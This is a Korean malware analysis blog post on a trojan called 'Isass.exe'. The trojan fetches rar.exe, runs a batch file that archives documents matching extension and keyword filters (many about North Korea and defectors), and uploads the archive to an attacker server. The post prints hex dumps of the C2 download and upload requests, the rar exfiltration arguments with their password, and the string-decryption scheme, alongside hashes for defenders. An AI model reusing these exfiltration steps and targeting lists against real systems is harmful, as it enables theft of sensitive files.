본문 바로가기
악성코드 정보

RAR.EXE 압축툴을 이용한 중요 파일들 유출하는 악성코드

by yhayoung 2014. 11. 20.

2014년 11월 11일 발견된 "Isass.exe" 라는 이름의 악성코드는 감염 시, "rar.exe" 라는 정상 압축 프로그램을 이용하여 시스템의 중요한 파일들을 찾아 압축 후, 공격자에게 전송하는 기능을 수행한다. 국내에 감염이 최초 확인된 것은 2013년 8월로 당시에는 취약한 문서파일 통해 최초 감염이 이루어졌다. 하지만, 최근 발견된 샘플은 아직 정확한 감염경로를 확인하지 못한 상태이다. 악성코드의 동작과정을 살펴보면 특정 사이트로 부터 [1] "rar.exe" 파일에 대한 다운로드가 이루어지며, [2] "ebgEC50.bat" 파일생성을 통한 중요파일들 압축을 수행하고, [3] 최종 압축한 파일("NETUSER.001")을 공격자에게 전송의 과정으로 이루어진다.

 

 

 [1] "rar.exe" 파일 다운로드

 

악성코드는 아래의 %TEMP% 폴더에 "rar.exe" 라는 파일의 존재여부를 체크한다. 만약, 해당 파일이 존재하지 않을 경우, 특정 사이트로 접속하여 "rar.exe" 를 다운로드 시도하며 이미 존재할 경우, 다운로드 과정을 생략한다.

 

- "C:\Documents and Settings\UserProfile\Local Settings\Temp\rar.exe"

 

"rar.exe" 파일을 다운로드 받는 곳의 주소는 아래와 같고, 전송(send) 하는 데이터의 내용은 다음과 같다.

 

- k??32.k??.org/file/lecture/list.php (다운로드 주소)

 

 0081CF70  50 4F 53 54 20 2F 66 69 6C 65 2F 6C 65 63 74 75  POST /file/lectu
 0081CF80  72 65 2F 6C 69 73 74 2E 70 68 70 20 48 54 54 50  re/list.php HTTP
 0081CF90  2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 6B ?? ?? 33  /1.1..Host: k??3
 0081CFA0  32 2E 6B ?? ?? 2E 6F 72 67 3A 38 30 0D 0A 43 6F  2.k??.org:80..Co
 0081CFB0  6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C  ntent-type: appl
 0081CFC0  69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
 0081CFD0  72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
 0081CFE0  6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 31  ontent-Length: 1
 0081CFF0  31 0D 0A 0D 0A 66 66 3D 33 39 38 37 32 39 33 38  1....ff=39872938
 0081D000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 

 

서버로 부터 정상적으로 응답 데이터를 받을 경우, 아래와 같은 형태를 갖는다. 데이터 내용 중, 'MZ'로 시작하는 부분이 "rar.exe"의 시작을 나타낸다. 분석 당시 "rar.exe" (md5:070d15cd95c14784606ecaa88657551e) 파일의 버전은 5.1.0 로 확인되었다.

 

 0081D7C0  48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
 0081D7D0  0A 44 61 74 65 3A 20 57 65 64 2C 20 31 39 20 4E  .Date: Wed, 19 N
 0081D7E0  6F 76 20 32 30 31 34 20 31 30 3A 32 36 3A 32 37  ov 2014 10:26:27
 0081D7F0  20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
 0081D800  61 63 68 65 0D 0A 58 2D 50 6F 77 65 72 65 64 2D  ache..X-Powered-
 0081D810  42 79 3A 20 50 48 50 2F 34 2E 34 2E 39 0D 0A 43  By: PHP/4.4.9..C
 0081D820  6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74 69  ontent-Dispositi
 0081D830  6F 6E 3A 20 61 74 74 61 63 68 6D 65 6E 74 3B 20  on: attachment;
 0081D840  66 69 6C 65 6E 61 6D 65 3D 22 62 62 73 5F 77 72  filename="bbs_wr
 0081D850  69 74 65 2E 70 68 70 22 0D 0A 4C 61 73 74 2D 4D  ite.php"..Last-M
 0081D860  6F 64 69 66 69 65 64 3A 20 54 68 75 2C 20 31 36  odified: Thu, 16
 0081D870  20 4F 63 74 20 32 30 31 34 20 31 30 3A 35 37 3A   Oct 2014 10:57:
 0081D880  34 39 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52  49 GMT..Accept-R
 0081D890  61 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 43 61  anges: bytes..Ca
 0081D8A0  63 68 65 2D 63 6F 6E 74 72 6F 6C 3A 20 70 72 69  che-control: pri
 0081D8B0  76 61 74 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E  vate..Connection
 0081D8C0  3A 20 43 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74  : Close..Content
 0081D8D0  2D 4C 65 6E 67 74 68 3A 20 34 39 30 30 37 32 0D  -Length: 490072.
 0081D8E0  0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61  .Content-Type: a
 0081D8F0  70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74  pplication/octet
 0081D900  2D 73 74 72 65 61 6D 0D 0A 0D 0A 4D 5A 90 00 03  -stream....MZ?
 0081D910  00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00  ........?...
 0081D920  00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00  ...@............
 0081D930  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 0081D940  00 00 00 00 00 00 00 E0 00 00 00 0E 1F BA 0E 00  .......?..?. 
 0081D950  B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72  ???L?This pr   
 0081D960  6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20  ogram cannot be
 0081D970  72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E  run in DOS mode.

 

다운로드 실패 시, 10분간의 Sleep() 후, 재시도를 한다. 다운로드가 성공적으로 이루어진 경우, %TEMP% 폴더에 "rar.exe" 파일을 Write 한다. 다운로드가 성공적으로 이루어졌는지에 대한 검증은 서버로 부터 받은 데이터를 통해 이루어지며, 아래의 3가지 과정을 거친다.

 

(1) "HTTP/1.1 200 OK" 문자열 존재해야 함.

 

(2) "error" 문자열이 없어야 함.

 

(3) CR,LF,CR,LF (0x0D, 0x0A, 0x0D, 0x0A) 다음("MZ")부터 버퍼 끝까지의 크기와 "Content-Length: "에 명시된 값("490072")과의 비교를 수행. (만약, 명시된 값과 동일하지 않을 경우, "rar.exe" 삭제 후, 다운로드 과정을 재 시도)

 

 

[2] "ebgEC50.bat" 파일생성

 

"rar.exe" 파일을 다운로드 한 후, 악성코드는 %TEMP% 폴더에 "ebgEC50.bat" 파일을 생성 및 실행하는 기능을 수행한다. BAT 파일의 내용에 해당하는 데이터는 악성코드 내부에 존재하며, 암호화된 형태로 저장되어 있다. BAT 파일의 내용 뿐 아니라 악성코드 내부에는 중요한 문자열 정보가 암호화된 형태로 존재하며, 아래와 같은 과정을 통해 만들어지는 특징을 갖는다.

 

다음은 악성코드 내부에서 "r.a.r...e.x.e" 문자열 정보를 만들어 내는 과정을 나타낸다. 0xB5 값을 초기값으로 하여, 특정 값과 ADD/SUB 연산을 통해 그 다음 암호화된 값을 생성한다.

 

 

위의 코드를 통해 최초 생성된 암호화된 데이터는 다음과 같다.

(0xB5 0x00 0xA6 0x00 0xB5 0x00 0xE9 0x00 0xA2 0x00 0xBF 0x00 0xA2 0x00 0x00 0x00)

 

이렇게 생성된 값은 아래의 XOR 과정을 통해 최종 복호화가 이루어진다. (키값은 0xC7, 크기는 0x07)

 

 

위의 코드를 통해 최종 생성된 복호화된 데이터는 다음과 같다. ("r.a.r...e.x.e")

(0x72 0x00 0x61 0x00 0x72 0x00 0x2E 0x00 0x65 0x00 0x78 0x00 0x65 0x00 0x00 0x00)

 

악성코드 내부에 이러한 방식으로 암호화되어 저장된 문자열 정보는 총 19개이며, 복호화 방식은 1바이트 XOR (18개)와 1바이트 ADD/SUB 형태(1개)가 존재한다.

 

아래의 [표-1]~[표-19]는 복호화 과정 후, 생성된 문자열 정보를 나타낸다.

 

 

 

"ebgEC50.bat" 파일의 내용은 [표-10]에 의해 만들어지며, 감염 시스템의 주요 문서와 특정 확장자 파일들에 대한 유출기능을 갖는다.

 

"ebgEC50.bat" 파일은 구동 시, %TEMP%\rar.exe 파일을 실행하며, "rar.exe" 파일에서 제공하는 다양한 인자값들을 사용하였다.  아래는 다양한 인자값들 중 악성코드에서 사용한 인자값들을 나타낸다.

 

 

"%TEMP%\rar.exe" a "%temp%\NETUSER.001" 를 통해, 최종 압축된 파일은 "NETUSER.001" 임을 알 수 있다. 또한, "%USERPROFILE%" 경로와 'a', 'b', 'c' 드라이브를 제외한 모든 드라이브의 파일들이 검색 대상임을 알 수 있다. (d:\ e:\ f:\ g:\ h:\ i:\ j:\ k:\ l:\ m:\ n:\ o:\ p:\ q:\ r:\ s:\ t:\ u:\ v:\ w:\ x:\ y:\ z:\)

 

-hp1qaz@WSX3edc$RFV -r -v2g -vn -m5 -y -ep3 -ta2005 -sl2048576 를 통해 최종 압축된 파일에 대한 암호가 '1qaz@WSX3edc$RFV' 로 설정되며, 2005년 이후 생성된 파일 및 2048576(2M) 보다 작은 크기의 파일들이 유출대상임을 알 수 있다.

 

또한, 파일명에 대한 필터조건으로 특정 이름을 갖는 파일들을 선별하여 유출하도록 하였으며, 파일이름에 상관없이 특정 확장자를 갖는 파일들에 대해서도 유출이 이루어진다.

 

(1) 확장자 필터조건

*.lnk, *.hwp, *.doc, *.docx, *.xls, *.xlsx, *.amr, *.zip, *.eml, *.alz, *.rar, *.egg

 

(2) 파일이름 필터조건

*암호*, *비번*, *비밀*, *보안*, *정보*, *소식*, *자료*, *분석*, *관리*, *수집*, *녹취*, *대화*, *녹음*, *정세*, *계획*, *보고*, *출장*, *이력*, *프로포절*, *협조자*, *취재원*, *북핵*, *전략*, *전술*, *미사일*, *로케트*, *북핵*, *주소*, *명단*, *리스트*, *중국*, *심양*, *단동*, *연길*, *대련*, *베이징*, *북한*, *평양*, *회령*, *신의주*, *무산*, *청진*, *원산*, *개성*, *남포*, *만포*, *국경*, *내곡동*, *여의도*, *경비대*, *총정치국*, *보위*, *군단*, *사단*, *련대*, *대대*, *중대*, *소대*, *려단*, *하나원*, *기무*, *정보사*, *국정원*, *기구*, *국방*, *사령부*, *외교*, *통일*, *인권*, *동지*, *성통만사*, *탈북*, *이탈*, *겨레얼*, *전략*, *난민*, *서평*, *뉴포커스*, *새터민*, *mopas*, *엔케이*, *홈페*

 

아래의 그림은 "ebgEC50.bat" 수행 후, 생성된 "NETUSER.001" 파일을 압축해제 시, 폴더구조를 나타낸다. 각 드라이브 별로 파일들이 저장되어 있음을 알 수 있다.

 

 

 

 

[3] 압축파일(NETUSER.001) 전송

 

 공격자에게 전송되는 파일은 아래의 경로의 RAR 압축파일이다.

- C:\Documents and Settings\UserProfile\Local Settings\Temp\NETUSER.001

 

아래는 공격자에게 전송되는 데이터의 내용을 나타낸다.

 

  0080883C  50 4F 53 54 20 2F ?? ?? ?? ?? ?? ?? ?? ?? 2F 42   POST /????????/B
 0080884C  4F 41 52 44 2F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??   OARD/???????????
 0080885C  2F 31 34 30 36 2F 6C 69 73 74 2E 70 68 70 20 48   /1406/list.php H
 0080886C  54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 2D   TTP/1.1..Accept-
 0080887C  45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20   Encoding: gzip,
 0080888C  64 65 66 6C 61 74 65 0D 0A 55 73 65 72 2D 41 67   deflate..User-Ag
 0080889C  65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30   ent: Mozilla/4.0
 008088AC  20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53    (compatible; MS
 008088BC  49 45 20 36 2E 30 3B 20 57 69 6E 64 6F 77 73 20   IE 6.0; Windows
 008088CC  4E 54 20 35 2E 31 3B 20 53 56 31 29 0D 0A 41 63   NT 5.1; SV1)..Ac
 008088DC  63 65 70 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C   cept: image/gif,
 008088EC  20 69 6D 61 67 65 2F 78 2D 78 62 69 74 6D 61 70    image/x-xbitmap
 008088FC  2C 20 69 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D   , image/jpeg, im
 0080890C  61 67 65 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69   age/pjpeg, appli
 0080891C  63 61 74 69 6F 6E 2F 78 2D 73 68 6F 63 6B 77 61   cation/x-shockwa
 0080892C  76 65 2D 66 6C 61 73 68 2C 20 2A 2A 0D 0A 41 63   ve-flash, **..Ac
 0080893C  63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65   cept-Language: e
 0080894C  6E 2D 75 73 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79   n-us..Content-Ty
 0080895C  70 65 3A 20 6D 75 6C 74 69 70 61 72 74 2F 66 6F   pe: multipart/fo
 0080896C  72 6D 2D 64 61 74 61 3B 62 6F 75 6E 64 61 72 79   rm-data;boundary
 0080897C  3D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   =---------------
 0080898C  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30 34   --------------04
 0080899C  65 32 38 30 30 30 30 35 64 63 62 0D 0A 48 6F 73   e2800005dcb..Hos
 008089AC  74 3A 20 63 ?? ?? 6A 65 6F 6E 2E 63 6F 6D 3A 38   t: c??jeon.com:8
 008089BC  30 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74   0..Content-Lengt
 008089CC  68 3A 20 31 30 34 38 39 32 34 0D 0A 43 6F 6E 6E   h: 1048924..Conn
 008089DC  65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69   ection: Keep-Ali
 008089EC  76 65 0D 0A 43 61 63 68 65 2D 43 6F 6E 74 72 6F   ve..Cache-Contro
 008089FC  6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 0D 0A 00   l: no-cache.....
 00808A0C  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

 

아래의 전송하는 데이터 중, 붉은 색으로 표시한 부분은 감염 시스템의 MAC 주소이며, 이를 "id" 값으로 사용함을 알 수 있다.

 

 0080CD6C  0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   ..--------------
 0080CD7C  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   ----------------
 0080CD8C  2D 30 34 65 32 38 30 30 30 30 35 64 63 62 0D 0A   -04e2800005dcb.. 
 0080CD9C  43 6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74   Content-Disposit
 0080CDAC  69 6F 6E 3A 20 66 6F 72 6D 2D 64 61 74 61 3B 20   ion: form-data;
 0080CDBC  6E 61 6D 65 3D 22 69 64 22 0D 0A 0D 0A 30 30 31   name="id"....001
 0080CDCC  64 ?? ?? ?? 36 63 66 37 64 0D 0A 2D 2D 2D 2D 2D   d???6cf7d..-----
 0080CDDC  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   ----------------
 0080CDEC  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30 34 65 32 38 30   ----------04e280
 0080CDFC  30 30 30 35 64 63 62 2D 2D 0D 0A 00 00 00 00 00   0005dcb--....... 

 

아래의 전송하는 데이터를 통해 해당 악성코드 제작자가 중국인으로 추정된다. ("wenjian")

 

  0080861C  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   ----------------
 0080862C  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30   ---------------0
 0080863C  34 65 32 38 30 30 30 30 35 64 63 62 0D 0A 43 6F   4e2800005dcb..Co
 0080864C  6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74 69 6F   ntent-Dispositio
 0080865C  6E 3A 20 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61   n: form-data; na
 0080866C  6D 65 3D 22 77 65 6E 6A 69 61 6E 22 3B 20 66 69   me="wenjian"; fi
 0080867C  6C 65 6E 61 6D 65 3D 22 43 3A 5C 44 4F 43 55 4D   lename="C:\DOCUM
 0080868C  45 7E 31 5C ?? ?? ?? ?? ?? ?? 5C 4C 4F 43 41 4C   E~1\??????\LOCAL
 0080869C  53 7E 31 5C 54 65 6D 70 5C 4E 45 54 55 53 45 52   S~1\Temp\NETUSER
 008086AC  2E 30 30 31 22 0D 0A 43 6F 6E 74 65 6E 74 2D 54   .001"..Content-T
 008086BC  79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E   ype: application
 008086CC  2F 6F 63 74 65 74 2D 73 74 72 65 61 6D 0D 0A 0D   /octet-stream...
 008086DC  0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

 

공격자에게 전송하는 NETUSER.001 파일은 최종 전송과정에서 0xAB로 XOR를 통해 암호화하여 전송된다. 또한, 서버로 부터 받은 데이터 중, 특정 문자열 확인을 통해 전송의 종료여부를 체크하는 것으로 추정된다. 아래는 분석당시 서버로 부터 전달받은 데이터를 나타낸다.

 

 0080CE7C  48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D   HTTP/1.1 200 OK.
 0080CE8C  0A 44 61 74 65 3A 20 57 65 64 2C 20 31 39 20 4E   .Date: Wed, 19 N
 0080CE9C  6F 76 20 32 30 31 34 20 31 32 3A 30 31 3A 34 33   ov 2014 12:01:43
 0080CEAC  20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 4D 69    GMT..Server: Mi
 0080CEBC  63 72 6F 73 6F 66 74 2D 49 49 53 2F 35 2E 30 0D   crosoft-IIS/5.0.
 0080CECC  0A 58 2D 50 6F 77 65 72 65 64 2D 42 79 3A 20 50   .X-Powered-By: P
 0080CEDC  48 50 2F 35 2E 32 2E 31 37 0D 0A 43 6F 6E 74 65   HP/5.2.17..Conte
 0080CEEC  6E 74 2D 4C 65 6E 67 74 68 3A 20 36 0D 0A 4B 65   nt-Length: 6..Ke
 0080CEFC  65 70 2D 41 6C 69 76 65 3A 20 74 69 6D 65 6F 75   ep-Alive: timeou
 0080CF0C  74 3D 35 2C 20 6D 61 78 3D 31 30 30 0D 0A 43 6F   t=5, max=100..Co
 0080CF1C  6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41   nnection: Keep-A
 0080CF2C  6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79   live..Content-Ty
 0080CF3C  70 65 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D   pe: text/html...
 0080CF4C  0A 63 68 67 6F 6E 67 00 00 00 00 00 00 00 00 00   .chgong.........
 0080CF5C  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

 

"rar.exe" 파일에 대한 다운로드를 성공적으로 수행했는지 여부를 체크한 것과 유사한 방식으로 서버로 부터 전달받은 버퍼 중, 특정 문자열 패턴의 존재여부를 체크한다.

 

(1) "HTTP/1.1 200 OK" 문자열이 존재해야 함.

 

(2) CR,LF,CR,LF (0x0D, 0x0A, 0x0D, 0x0A) 다음에 "sibai" 라는 문자열이 존재하는 지 체크.

 

모든 과정이 종료된 후, %TEMP% 폴더의 "NETUSER.001"과 "ebgEC50.bat"은 삭제된다.

 

 

[4] 분석파일들

 

(1) Isass.exe (md5: E60958951B83B52A328C4E4E2EB58C6C) - Trojan/Win32.Compfolder

(2) rar.exe (070D15CD95C14784606ECAA88657551E) - 정상파일

(3) ebgEC50.bat (md5: 0C256742B5A396CC4DD8BBAC7C69F556) - BAT/Filestealer

 

 

[5] 유사 파일들에 대한 PDB정보

 

(1)Isass.exe

- V3: Trojan/Win32.Compfolder

- md5: b0d0a27bcc9d6e6a549782e1f6a934ee

- PDB: F:\WorkingSource\First_Stage\CompressFolder\Release\CompressFolder.pdb

 

(2) svchost.exe

- V3: Trojan/Win32.Compfolder

- md5: ebd638798aa7920151f1fd3197403ef0

- PDB: F:\WorkingSource\First_Stage\svchost(excute exe)\Release\svchost.pdb

 

(3) svchost.exe

- V3: Trojan/Win32.Compfolder

- md5: 54758b6fafa545f09bf2fff82b3b343b

- PDB" F:\WorkingSource\SecondStage\svchost(service install)X86\Release\svchost.pdb

 

(4) svchost.exe

- V3: Trojan/Win32.Compfolder

- md5: 85d85a6075a04ae24fb5c0004405d548

- PDB: G:\MyCreateProject\MyActive\svchost(excute exe)\Release\svchost.pdb

 

(5) lsuss.exe

- V3: Trojan/Win32.Compfolder

- md5: 4c062c27bf2ff9ba71abd9682eb17c93

- PDB: F:\WorkingSource\Util\KeyLog\Release\Keylog.pdb

 

(6) USASS.EXE 

- V3: Trojan/Win32.Compfolder

- md5: 3bb9d56cb39d0422964f781d8d948cb8

- PDB: G:\MyProject\1st\CompressFolder\Release\CompressFolder.pdb

 

 

 

댓글